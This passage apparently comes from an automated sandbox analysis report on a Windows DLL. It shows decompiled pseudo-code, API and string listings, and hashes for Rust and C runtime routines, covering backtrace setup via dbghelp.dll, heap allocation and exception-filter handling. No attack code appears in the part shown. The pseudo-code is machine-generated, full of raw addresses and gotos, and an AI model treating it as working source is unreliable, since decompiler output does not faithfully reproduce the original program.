													__eflags = _t241 - _v1100;
													if(_t241 != _v1100) {
														goto L6;
													} else {
														goto L13;
													}
												}
											}
										}
									}
								} else {
									_t264 = _t229;
									_v36 = _t249;
									_t211 = 0;
									__eflags = _t241 - _v1100;
									if(_t241 != _v1100) {
										goto L6;
									} else {
										goto L13;
									}
								}
								goto L96;
							}
							_t242 = _v1096;
							asm("movsd xmm0, [ebp-0x44c]");
							_v64 = _t242;
							asm("movsd [ebp-0x44], xmm0");
							__eflags = _t242 - 8;
							_t213 = _t242;
							_t148 = _v72;
							_t265 = _t148;
							if(_t242 < 8) {
								L45:
								_t214 = _t213 + _t213;
								asm("o16 nop [cs:eax+eax]");
								while(1) {
									__eflags = _t214;
									if(_t214 == 0) {
										break;
									}
									_t214 = _t214 + 0xfffffffe;
									__eflags =  *_t265;
									_t265 = _t265 + 2;
									if(__eflags != 0) {
										continue;
									} else {
										goto L48;
									}
									goto L96;
								}
								__eflags = _t242 - _v68;
								if(_t242 == _v68) {
									_v20 = 1;
									E6E457370( &_v72, _t242, 1);
									_t281 = _t281 + 4;
									_t148 = _v72;
									_t242 = _v64;
								}
								 *((short*)(_t148 + _t242 * 2)) = 0;
								asm("movsd xmm0, [ebp-0x44]");
								asm("movsd [ebp-0x38], xmm0");
								_t149 = _v60;
								__eflags = _t149;
								_v36 = _t149;
								if(_t149 == 0) {
									goto L75;
								} else {
									_v80 = _v56;
									E6E44C310(_t245,  &_v1104, 0, 0x400);
									_t281 = _t281 + 0xc;
									_t155 =  *0x6e47d0bc; // 0x2
									_t194 = 0x200;
									_t262 = 0;
									_v60 = _t155;
									_v56 = 0;
									_v48 = _t155;
									_v52 = 0;
									__eflags = 0x200 - 0x201;
									if(0x200 >= 0x201) {
										L65:
										_t157 = _t194 - _t262;
										__eflags = _v56 - _t262 - _t157;
										if(_v56 - _t262 < _t157) {
											_v44 = _t194;
											_v20 = 5;
											E6E457370( &_v60, _t262, _t157);
											_t281 = _t281 + 4;
											_t194 = _v44;
											_v48 = _v60;
										}
										_t247 = _v48;
										_t262 = _t194;
										_v52 = _t194;
										_v40 = _t194;
									} else {
										L68:
										_t247 =  &_v1104;
										_v40 = 0x200;
									}
									L69:
									_v44 = _t247;
									SetLastError(0);
									_t158 = GetEnvironmentVariableW(_v36, _t247, _t194);
									_t245 = _t158;
									__eflags = _t158;
									if(_t158 != 0) {
										L71:
										__eflags = _t245 - _t194;
										if(_t245 != _t194) {
											L63:
											__eflags = _t245 - _t194;
											_t192 = _t245;
											if(_t245 < _t194) {
												_t239 = _v40;
												_v20 = 5;
												__eflags = _t245 - _v40;
												if(__eflags > 0) {
													goto L95;
												} else {
													_push(_t245);
													E6E440EC0(_t192,  &_v72, _v44, _t245, _t262);
													_t281 = _t281 + 4;
													_t218 = _v72;
													_t248 = _v68;
													_t262 = _v64;
													_t195 = 0;
													_t160 = _v56;
													__eflags = _t160;
													if(_t160 != 0) {
														goto L81;
													} else {
													}
													goto L84;
												}
											} else {
												__eflags = _t192 - 0x201;
												if(_t192 < 0x201) {
													goto L68;
												} else {
													goto L65;
												}
												goto L69;
											}
										} else {
											_t171 = GetLastError();
											__eflags = _t171 - 0x7a;
											if(_t171 != 0x7a) {
												goto L63;
											} else {
												_t194 = _t194 + _t194;
												__eflags = _t194 - 0x201;
												if(_t194 < 0x201) {
													goto L68;
												} else {
													goto L65;
												}
												goto L69;
											}
										}
									} else {
										_t172 = GetLastError();
										__eflags = _t172;
										if(_t172 != 0) {
											_t195 = 1;
											_t173 = GetLastError();
											_t218 = 0;
											_t248 = _t173;
											_t160 = _v56;
											__eflags = _t160;
											if(_t160 != 0) {
												L81:
												__eflags = _v48;
												if(_v48 != 0) {
													__eflags = _t160 & 0x7fffffff;
													if((_t160 & 0x7fffffff) != 0) {
														_v44 = _t218;
														HeapFree( *0x6e48adc8, 0, _v48);
														_t218 = _v44;
													}
												}
											}
											L84:
											__eflags = _t195;
											if(_t195 == 0) {
												_t161 = _v76;
												 *_t161 = _t218;
												_t161[1] = _t248;
												_t161[2] = _t262;
											} else {
												__eflags = _t218 - 3;
												 *_v76 = 0;
												if(_t218 == 3) {
													_v20 = 4;
													_v44 = _t248;
													 *((intOrPtr*)( *((intOrPtr*)(_t248 + 4))))( *_t248);
													_t281 = _t281 + 4;
													_t267 = _v44;
													_t220 =  *((intOrPtr*)(_t267 + 4));
													__eflags =  *(_t220 + 4);
													if( *(_t220 + 4) != 0) {
														_t167 =  *_t267;
														__eflags =  *((intOrPtr*)(_t220 + 8)) - 9;
														if( *((intOrPtr*)(_t220 + 8)) >= 9) {
															_t167 =  *(_t167 - 4);
														}
														HeapFree( *0x6e48adc8, 0, _t167);
													}
													HeapFree( *0x6e48adc8, 0, _t267);
												}
											}
											__eflags = _v80 & 0x7fffffff;
											if((_v80 & 0x7fffffff) != 0) {
												HeapFree( *0x6e48adc8, 0, _v36);
											}
											goto L76;
										} else {
											goto L71;
										}
									}
								}
							} else {
								_t228 = _t242;
								_t268 = _t148;
								while(1) {
									__eflags =  *_t268;
									if( *_t268 == 0) {
										break;
									}
									__eflags =  *((short*)(_t268 + 2));
									if( *((short*)(_t268 + 2)) == 0) {
										break;
									} else {
										__eflags =  *((short*)(_t268 + 4));
										if( *((short*)(_t268 + 4)) == 0) {
											break;
										} else {
											__eflags =  *((short*)(_t268 + 6));
											if( *((short*)(_t268 + 6)) == 0) {
												break;
											} else {
												__eflags =  *((short*)(_t268 + 8));
												if( *((short*)(_t268 + 8)) == 0) {
													break;
												} else {
													__eflags =  *((short*)(_t268 + 0xa));
													if( *((short*)(_t268 + 0xa)) == 0) {
														break;
													} else {
														__eflags =  *((short*)(_t268 + 0xc));
														if( *((short*)(_t268 + 0xc)) == 0) {
															break;
														} else {
															__eflags =  *((short*)(_t268 + 0xe));
															if( *((short*)(_t268 + 0xe)) == 0) {
																break;
															} else {
																_t228 = _t228 + 0xfffffff8;
																_t268 = _t268 + 0x10;
																__eflags = _t228 - 7;
																if(_t228 > 7) {
																	continue;
																} else {
																	goto L45;
																}
															}
														}
													}
												}
											}
										}
									}
									goto L96;
								}
								L48:
								_t223 = _v68;
								_v56 = 0x6e47dec8;
								_v60 = 0x1402;
								__eflags = _t223;
								if(_t223 != 0) {
									__eflags = _t148;
									if(_t148 != 0) {
										__eflags = _t223 & 0x7fffffff;
										if((_t223 & 0x7fffffff) != 0) {
											HeapFree( *0x6e48adc8, 0, _t148);
										}
									}
								}
								__eflags = _v60 - 3;
								if(_v60 == 3) {
									_t224 = _v56;
									_v36 = _t224;
									_t70 = _t224 + 4; // 0x2c
									_v20 = 2;
									 *((intOrPtr*)( *_t70))( *_t224);
									_t281 = _t281 + 4;
									_t179 = _v36;
									_t226 =  *((intOrPtr*)(_t179 + 4));
									__eflags =  *(_t226 + 4);
									if( *(_t226 + 4) != 0) {
										_t181 =  *_t179;
										__eflags =  *((intOrPtr*)(_t226 + 8)) - 9;
										if( *((intOrPtr*)(_t226 + 8)) >= 9) {
											_t181 =  *(_t181 - 4);
										}
										HeapFree( *0x6e48adc8, 0, _t181);
										_t179 = _v56;
									}
									HeapFree( *0x6e48adc8, 0, _t179);
								}
								L75:
								 *_v76 = 0;
								L76:
								_t151 = _v28;
								 *[fs:0x0] = _t151;
								return _t151;
							}
							goto L96;
						}
					}
				} else {
					_t142 = GetProcessHeap();
					if(_t142 == 0) {
						L94:
						_t239 = 2;
						E6E456C30(_t192, 0xa, 2, _t245, _t262, __eflags);
						asm("ud2");
						L95:
						E6E456DB0(_t192, _t245, _t239, _t245, _t262, __eflags, 0x6e47ded0);
						asm("ud2");
						__eflags =  &_a8;
						E6E434AA0( *_v44,  *((intOrPtr*)(_v44 + 4)));
						return E6E43D420(_t263);
					} else {
						 *0x6e48adc8 = _t142;
						goto L3;
					}
				}
				L96:
			}

0x6e43d530
0x6e43d530
0x6e43d530
0x6e43d533
0x6e43d534
0x6e43d535
0x6e43d536
0x6e43d53c
0x6e43d53f
0x6e43d546
0x6e43d54d
0x6e43d55a
0x6e43d55d
0x6e43d563
0x6e43d56a
0x6e43d57e
0x6e43d583
0x6e43d58a
0x00000000
0x6e43d590
0x6e43d590
0x6e43d596
0x6e43d59b
0x6e43d59d
0x6e43d5a2
0x6e43d5a8
0x6e43d5b2
0x6e43d5bc
0x6e43d5ed
0x6e43d5f0
0x6e43d5f3
0x00000000
0x00000000
0x6e43d5f5
0x6e43d5fc
0x6e43d604
0x6e43d5df
0x6e43d5df
0x6e43d5e2
0x6e43d5e6
0x6e43d5e7
0x00000000
0x6e43d606
0x6e43d63a
0x6e43d644
0x6e43d647
0x6e43d64e
0x6e43d659
0x6e43d662
0x6e43d66a
0x6e43d66d
0x6e43d671
0x6e43d676
0x6e43d5d0
0x6e43d5d6
0x6e43d5d9
0x6e43d5dc
0x00000000
0x6e43d5dc
0x6e43d610
0x6e43d616
0x6e43d618
0x6e43d61e
0x6e43d621
0x6e43d624
0x6e43d627
0x6e43d629
0x6e43d681
0x6e43d68a
0x6e43d68c
0x6e43d6b3
0x6e43d6bb
0x6e43d6be
0x6e43d6c3
0x6e43d6c6
0x00000000
0x6e43d6c8
0x6e43d6c8
0x6e43d6cc
0x6e43d6d2
0x6e43d6d4
0x6e43d6da
0x00000000
0x6e43d6e0
0x00000000
0x6e43d6e0
0x6e43d6da
0x6e43d68e
0x6e43d68e
0x6e43d692
0x6e43d695
0x6e43d698
0x6e43d69b
0x6e43d6eb
0x6e43d6ed
0x6e43d6f3
0x00000000
0x00000000
0x00000000
0x00000000
0x6e43d69d
0x6e43d6a3
0x6e43d6a5
0x6e43d715
0x6e43d715
0x6e43d717
0x6e43d6a7
0x6e43d6ab
0x6e43d6ae
0x6e43d6ae
0x6e43d71a
0x6e43d71d
0x6e43d71f
0x6e43d722
0x6e43d745
0x6e43d747
0x6e43d74a
0x6e43d750
0x00000000
0x6e43d752
0x00000000
0x6e43d752
0x6e43d724
0x6e43d724
0x6e43d72d
0x6e43d72f
0x6e43d75a
0x6e43d75a
0x6e43d75c
0x6e43d731
0x6e43d737
0x6e43d73a
0x6e43d73a
0x6e43d76f
0x6e43d771
0x6e43d774
0x6e43d77a
0x6e43d6f9
0x6e43d6f9
0x6e43d6fc
0x6e43d6fe
0x6e43d704
0x00000000
0x6e43d70a
0x00000000
0x6e43d70a
0x6e43d780
0x6e43d780
0x6e43d780
0x6e43d786
0x6e43d7a0
0x6e43d7a3
0x6e43d7a6
0x6e43d7a8
0x6e43d7ab
0x6e43d7b1
0x00000000
0x6e43d7b7
0x00000000
0x6e43d7b7
0x6e43d7b1
0x6e43d77a
0x6e43d722
0x6e43d69b
0x6e43d62b
0x6e43d62b
0x6e43d62d
0x6e43d630
0x6e43d632
0x6e43d638
0x00000000
0x00000000
0x00000000
0x00000000
0x6e43d638
0x00000000
0x6e43d629
0x6e43d7bc
0x6e43d7c2
0x6e43d7ca
0x6e43d7cd
0x6e43d7d2
0x6e43d7d5
0x6e43d7d7
0x6e43d7da
0x6e43d7dc
0x6e43d824
0x6e43d824
0x6e43d826
0x6e43d830
0x6e43d830
0x6e43d832
0x00000000
0x00000000
0x6e43d838
0x6e43d83b
0x6e43d83f
0x6e43d842
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e43d842
0x6e43d8d0
0x6e43d8d3
0x6e43d8d5
0x6e43d8e1
0x6e43d8e6
0x6e43d8e9
0x6e43d8ec
0x6e43d8ec
0x6e43d8ef
0x6e43d8f5
0x6e43d8fa
0x6e43d8ff
0x6e43d902
0x6e43d904
0x6e43d907
0x00000000
0x6e43d90d
0x6e43d910
0x6e43d921
0x6e43d926
0x6e43d929
0x6e43d92e
0x6e43d933
0x6e43d935
0x6e43d938
0x6e43d93f
0x6e43d942
0x6e43d949
0x6e43d94f
0x6e43d972
0x6e43d977
0x6e43d97b
0x6e43d97d
0x6e43d97f
0x6e43d982
0x6e43d98f
0x6e43d994
0x6e43d99a
0x6e43d99d
0x6e43d99d
0x6e43d9a0
0x6e43d9a3
0x6e43d9a5
0x6e43d9a8
0x6e43d951
0x6e43d9b0
0x6e43d9b0
0x6e43d9b6
0x6e43d9b6
0x6e43d9bd
0x6e43d9bd
0x6e43d9c2
0x6e43d9cd
0x6e43d9d3
0x6e43d9d5
0x6e43d9d7
0x6e43d9e3
0x6e43d9e3
0x6e43d9e5
0x6e43d960
0x6e43d960
0x6e43d962
0x6e43d964
0x6e43da26
0x6e43da29
0x6e43da30
0x6e43da32
0x00000000
0x6e43da38
0x6e43da3e
0x6e43da3f
0x6e43da44
0x6e43da47
0x6e43da4a
0x6e43da4d
0x6e43da50
0x6e43da52
0x6e43da55
0x6e43da57
0x00000000
0x00000000
0x6e43da59
0x00000000
0x6e43da57
0x6e43d96a
0x6e43d96a
0x6e43d970
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e43d970
0x6e43d9eb
0x6e43d9eb
0x6e43d9f1
0x6e43d9f4
0x00000000
0x6e43d9fa
0x6e43d9fa
0x6e43d9fc
0x6e43da02
0x00000000
0x6e43da04
0x00000000
0x6e43da04
0x00000000
0x6e43da02
0x6e43d9f4
0x6e43d9d9
0x6e43d9d9
0x6e43d9df
0x6e43d9e1
0x6e43da5b
0x6e43da5d
0x6e43da63
0x6e43da65
0x6e43da67
0x6e43da6a
0x6e43da6c
0x6e43da6e
0x6e43da6e
0x6e43da72
0x6e43da74
0x6e43da79
0x6e43da86
0x6e43da89
0x6e43da8e
0x6e43da8e
0x6e43da79
0x6e43da72
0x6e43da91
0x6e43da91
0x6e43da93
0x6e43daed
0x6e43daf0
0x6e43daf2
0x6e43daf5
0x6e43da95
0x6e43da98
0x6e43da9b
0x6e43daa1
0x6e43daa8
0x6e43dab0
0x6e43dab3
0x6e43dab5
0x6e43dab8
0x6e43dabb
0x6e43dabe
0x6e43dac2
0x6e43dac4
0x6e43dac6
0x6e43daca
0x6e43dacc
0x6e43dacc
0x6e43dad8
0x6e43dad8
0x6e43dae6
0x6e43dae6
0x6e43daa1
0x6e43daf8
0x6e43daff
0x6e43db10
0x6e43db10
0x00000000
0x00000000
0x00000000
0x00000000
0x6e43d9e1
0x6e43d9d7
0x6e43d7de
0x6e43d7de
0x6e43d7e0
0x6e43d7e2
0x6e43d7e2
0x6e43d7e6
0x00000000
0x00000000
0x6e43d7e8
0x6e43d7ed
0x00000000
0x6e43d7ef
0x6e43d7ef
0x6e43d7f4
0x00000000
0x6e43d7f6
0x6e43d7f6
0x6e43d7fb
0x00000000
0x6e43d7fd
0x6e43d7fd
0x6e43d802
0x00000000
0x6e43d804
0x6e43d804
0x6e43d809
0x00000000
0x6e43d80b
0x6e43d80b
0x6e43d810
0x00000000
0x6e43d812
0x6e43d812
0x6e43d817
0x00000000
0x6e43d819
0x6e43d819
0x6e43d81c
0x6e43d81f
0x6e43d822
0x00000000
0x00000000
0x00000000
0x00000000
0x6e43d822
0x6e43d817
0x6e43d810
0x6e43d809
0x6e43d802
0x6e43d7fb
0x6e43d7f4
0x00000000
0x6e43d7ed
0x6e43d844
0x6e43d844
0x6e43d847
0x6e43d84e
0x6e43d855
0x6e43d857
0x6e43d859
0x6e43d85b
0x6e43d85d
0x6e43d863
0x6e43d86e
0x6e43d86e
0x6e43d863
0x6e43d85b
0x6e43d873
0x6e43d877
0x6e43d87d
0x6e43d882
0x6e43d885
0x6e43d888
0x6e43d890
0x6e43d892
0x6e43d895
0x6e43d898
0x6e43d89b
0x6e43d89f
0x6e43d8a1
0x6e43d8a3
0x6e43d8a7
0x6e43d8a9
0x6e43d8a9
0x6e43d8b5
0x6e43d8ba
0x6e43d8ba
0x6e43d8c6
0x6e43d8c6
0x6e43da09
0x6e43da0c
0x6e43da12
0x6e43da12
0x6e43da15
0x6e43da25
0x6e43da25
0x00000000
0x6e43d7dc
0x6e43d5ed
0x6e43d56c
0x6e43d56c
0x6e43d573
0x6e43db1a
0x6e43db1f
0x6e43db24
0x6e43db29
0x6e43db2b
0x6e43db32
0x6e43db3a
0x6e43db44
0x6e43db4f
0x6e43db5f
0x6e43d579
0x6e43d579
0x00000000
0x6e43d579
0x6e43d573
0x00000000

APIs

GetProcessHeap.KERNEL32 ref: 6E43D56C
HeapAlloc.KERNEL32(00260000,00000000,0000000A), ref: 6E43D583

Strings

RUST_BACKTRACE, xrefs: 6E43D63A, 6E43D670

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocProcess
String ID: RUST_BACKTRACE
API String ID: 1617791916-3454309823
Opcode ID: d6b4ec527807e1fafc172564749cd083a0ac69423910f36d9252273baacf6a89
Instruction ID: b7a7bcc385b7155536af9200793b291e7496ce260e03dc938153710c631b9399
Opcode Fuzzy Hash: d6b4ec527807e1fafc172564749cd083a0ac69423910f36d9252273baacf6a89
Instruction Fuzzy Hash: 61029AB1E002298BDF14DFFAD890B9DB7B2AF49314F25412AD429B7380D7B1A941CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E43E690, Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 135
libraryloadersynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E6E43E690(void* __ebx, void* __edi, void* __esi, char _a8) {
				int _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* __ebp;
				void* _t15;
				struct HINSTANCE__* _t20;
				signed int _t21;
				void* _t23;
				_Unknown_base(*)()* _t25;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t30;
				void* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t39;
				signed int _t50;
				_Unknown_base(*)()* _t52;
				void* _t59;

				_t48 = __edi;
				_push(__edi);
				_v32 = _t59 - 0x14;
				_v20 = 0xffffffff;
				_v24 = E6E443BA0;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t35 =  *0x6e48adc4; // 0x0
				if(_t35 == 0) {
					_t15 = CreateMutexA(0, 0, "Local\\RustBacktraceMutex");
					__eflags = _t15;
					if(_t15 == 0) {
						_t54 = 1;
						goto L19;
					} else {
						_t35 = _t15;
						__eflags = 0;
						asm("lock cmpxchg [0x6e48adc4], ebx");
						if(0 != 0) {
							CloseHandle(_t35);
							_t35 = 0;
						}
						goto L1;
					}
				} else {
					L1:
					WaitForSingleObjectEx(_t35, 0xffffffff, 0);
					_t20 =  *0x6e48add0; // 0x0
					if(_t20 != 0) {
						L3:
						_t54 = 0;
						if( *0x6e48ae04 != 0) {
							goto L19;
						} else {
							_t38 =  *0x6e48add4; // 0x0
							if(_t38 != 0) {
								L7:
								_t21 =  *_t38();
								_t39 =  *0x6e48add8; // 0x0
								_t50 = _t21;
								if(_t39 != 0) {
									L10:
									 *_t39(_t50 | 0x00000004);
									_t52 =  *0x6e48addc; // 0x0
									if(_t52 != 0) {
										L13:
										_t23 = GetCurrentProcess();
										 *_t52(_t23, 0, 1);
										 *0x6e48ae04 = 1;
										goto L19;
									} else {
										_t25 = GetProcAddress( *0x6e48add0, "SymInitializeW");
										if(_t25 == 0) {
											_v36 = _t35;
											_v20 = 0;
											E6E456E20(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t52, _t54, __eflags, 0x6e47dcac);
											goto L23;
										} else {
											_t52 = _t25;
											 *0x6e48addc = _t25;
											goto L13;
										}
									}
								} else {
									_t28 = GetProcAddress( *0x6e48add0, "SymSetOptions");
									if(_t28 == 0) {
										_v36 = _t35;
										_v20 = 0;
										E6E456E20(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t50, _t54, __eflags, 0x6e47dc9c);
										goto L23;
									} else {
										_t39 = _t28;
										 *0x6e48add8 = _t28;
										goto L10;
									}
								}
							} else {
								_t30 = GetProcAddress(_t20, "SymGetOptions");
								if(_t30 == 0) {
									_v36 = _t35;
									_v20 = 0;
									E6E456E20(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t48, 0, __eflags, 0x6e47dc8c);
									L23:
									asm("ud2");
									__eflags =  &_a8;
									return E6E43E880(_v36);
								} else {
									_t38 = _t30;
									 *0x6e48add4 = _t30;
									goto L7;
								}
							}
						}
					} else {
						_t20 = LoadLibraryA("dbghelp.dll");
						 *0x6e48add0 = _t20;
						if(_t20 == 0) {
							ReleaseMutex(_t35);
							_t54 = 1;
							L19:
							 *[fs:0x0] = _v28;
							return _t54;
						} else {
							goto L3;
						}
					}
				}
			}

0x6e43e690
0x6e43e694
0x6e43e699
0x6e43e69c
0x6e43e6a3
0x6e43e6b4
0x6e43e6b7
0x6e43e6bd
0x6e43e6c5
0x6e43e7a5
0x6e43e7aa
0x6e43e7ac
0x6e43e7d0
0x00000000
0x6e43e7ae
0x6e43e7ae
0x6e43e7b0
0x6e43e7b2
0x6e43e7ba
0x6e43e7c3
0x6e43e7c9
0x6e43e7c9
0x00000000
0x6e43e7ba
0x6e43e6cb
0x6e43e6cb
0x6e43e6d0
0x6e43e6d5
0x6e43e6dc
0x6e43e6f5
0x6e43e6f5
0x6e43e6fe
0x00000000
0x6e43e704
0x6e43e704
0x6e43e70c
0x6e43e729
0x6e43e729
0x6e43e72b
0x6e43e731
0x6e43e735
0x6e43e757
0x6e43e75b
0x6e43e75d
0x6e43e765
0x6e43e787
0x6e43e787
0x6e43e791
0x6e43e793
0x00000000
0x6e43e767
0x6e43e772
0x6e43e77a
0x6e43e83d
0x6e43e840
0x6e43e856
0x00000000
0x6e43e780
0x6e43e780
0x6e43e782
0x00000000
0x6e43e782
0x6e43e77a
0x6e43e737
0x6e43e742
0x6e43e74a
0x6e43e81a
0x6e43e81d
0x6e43e833
0x00000000
0x6e43e750
0x6e43e750
0x6e43e752
0x00000000
0x6e43e752
0x6e43e74a
0x6e43e70e
0x6e43e714
0x6e43e71c
0x6e43e7f7
0x6e43e7fa
0x6e43e810
0x6e43e85e
0x6e43e85e
0x6e43e864
0x6e43e873
0x6e43e722
0x6e43e722
0x6e43e724
0x00000000
0x6e43e724
0x6e43e71c
0x6e43e70c
0x6e43e6de
0x6e43e6e3
0x6e43e6ea
0x6e43e6ef
0x6e43e7d8
0x6e43e7dd
0x6e43e7e2
0x6e43e7e7
0x6e43e7f6
0x00000000
0x00000000
0x00000000
0x6e43e6ef
0x6e43e6dc

APIs

WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 6E43E6D0
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 6E43E6E3
GetProcAddress.KERNEL32(00000000,SymGetOptions,00000000,00000000,Local\RustBacktraceMutex), ref: 6E43E714
GetProcAddress.KERNEL32(SymSetOptions), ref: 6E43E742
GetProcAddress.KERNEL32(SymInitializeW), ref: 6E43E772
GetCurrentProcess.KERNEL32 ref: 6E43E787
CreateMutexA.KERNEL32(00000000,00000000,Local\RustBacktraceMutex), ref: 6E43E7A5
CloseHandle.KERNEL32(00000000), ref: 6E43E7C3

Part of subcall function 6E43E880: ReleaseMutex.KERNEL32(?,6E43E5F8), ref: 6E43E881

Strings

SymInitializeW, xrefs: 6E43E767
Local\RustBacktraceMutex, xrefs: 6E43E79C
SymGetOptions, xrefs: 6E43E70E
dbghelp.dll, xrefs: 6E43E6DE
SymSetOptions, xrefs: 6E43E737
called `Option::unwrap()` on a `None` value, xrefs: 6E43E801, 6E43E824, 6E43E847

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Mutex$CloseCreateCurrentHandleLibraryLoadObjectProcessReleaseSingleWait
String ID: Local\RustBacktraceMutex$SymGetOptions$SymInitializeW$SymSetOptions$called `Option::unwrap()` on a `None` value$dbghelp.dll
API String ID: 1067696788-3213342004
Opcode ID: 9e0bc60ff9d46d4f7d50a61efe977471623727ad243585cf3245169849951a98
Instruction ID: e110ad853fc636babfcc58014fc5e909ee5c396bb286a9dfe2610d4df0e95a84
Opcode Fuzzy Hash: 9e0bc60ff9d46d4f7d50a61efe977471623727ad243585cf3245169849951a98
Instruction Fuzzy Hash: F741F271E017519BEF50AFF69D90F9B36AAAB4A304F20043FE505E73C0DBB4C8019A91

Uniqueness

Uniqueness Score: -1.00%

Function 6E4377B4, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 423COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6E4378E3
__aulldiv.LIBCMT ref: 6E4378F3

Strings

{recursion limit reached}{invalid syntax}, xrefs: 6E437DC6
bool, xrefs: 6E437A4B
called `Option::unwrap()` on a `None` value, xrefs: 6E437B7C
?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6E4377C2, 6E437C19

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldiv__aullrem
String ID: ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$bool$called `Option::unwrap()` on a `None` value${recursion limit reached}{invalid syntax}
API String ID: 3839614884-433696047
Opcode ID: 88f42787188283907b9cc7e352dd0d0120de88086e0b3b28624452528ea9ad6f
Instruction ID: f43c39d499715c00f331699966a879351dab493f52ecb1f0dc90dee8bb24d1a3
Opcode Fuzzy Hash: 88f42787188283907b9cc7e352dd0d0120de88086e0b3b28624452528ea9ad6f
Instruction Fuzzy Hash: 33E1057160C6518FE704CFB9C494B6AB7E2AF8A314F24866FD4D58B3D1D334A846CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E44AB0C, Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6E44AB18
IsDebuggerPresent.KERNEL32 ref: 6E44ABE4
SetUnhandledExceptionFilter.KERNEL32 ref: 6E44AC04
UnhandledExceptionFilter.KERNEL32(?), ref: 6E44AC0E

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 6ba7548e16ab28f8355be97a9f0013dab20ccd90e981e0a9bf730d1023ce49bd
Instruction ID: cb6320599a6645da40df9ab410f6a834b04c5481e581a970ba7ccccfa14e6e94
Opcode Fuzzy Hash: 6ba7548e16ab28f8355be97a9f0013dab20ccd90e981e0a9bf730d1023ce49bd
Instruction Fuzzy Hash: 543107B5D55318DBEB50DFA4D989BCCBBB8EF08704F1044AAE50DAB240EB709A849F44

Uniqueness

Uniqueness Score: -1.00%

Function 6E450326, Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6E45041E
SetUnhandledExceptionFilter.KERNEL32 ref: 6E450428
UnhandledExceptionFilter.KERNEL32(C00000EF), ref: 6E450435

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: cd872b559ff73b44d463003f1ba9d57016afa70212bf97e4a373bf9f981fc942
Instruction ID: e32c412cdca99f53d99a19f7606bcf938a08dbaf19deceb3e487b3abbd958e8e
Opcode Fuzzy Hash: cd872b559ff73b44d463003f1ba9d57016afa70212bf97e4a373bf9f981fc942
Instruction Fuzzy Hash: 2F31D275911228ABCB61DF64D988BCCBBB8EF09314F5045EAE41CA6250EB709F858F44

Uniqueness

Uniqueness Score: -1.00%

Function 6E44A584, Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

